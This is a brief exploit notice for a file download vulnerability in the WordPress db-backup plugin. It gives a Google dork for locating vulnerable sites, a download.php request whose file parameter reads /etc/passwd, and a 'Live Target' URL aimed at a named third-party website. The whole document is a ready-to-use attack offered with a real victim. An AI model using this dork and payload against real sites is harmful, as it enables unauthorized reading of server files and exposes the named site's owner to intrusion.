WordPress db-backup plugin File Download Vulnerability

1. Google Dork: inurl:wp-content/plugins/db-backup/
2.  
3. Exploit path: /wp-content/plugins/db-backup/download.php?file=/etc/passwd
4.  
5. Example: http://www.[target].com/wp-content/plugins/db-backup/download.php?file=/etc/passwd
6.  
7. Live Target: http://www.bagneris.fr/laosi-siglis/wp-content/plugins/db-backup/download.php?file=/etc/passwd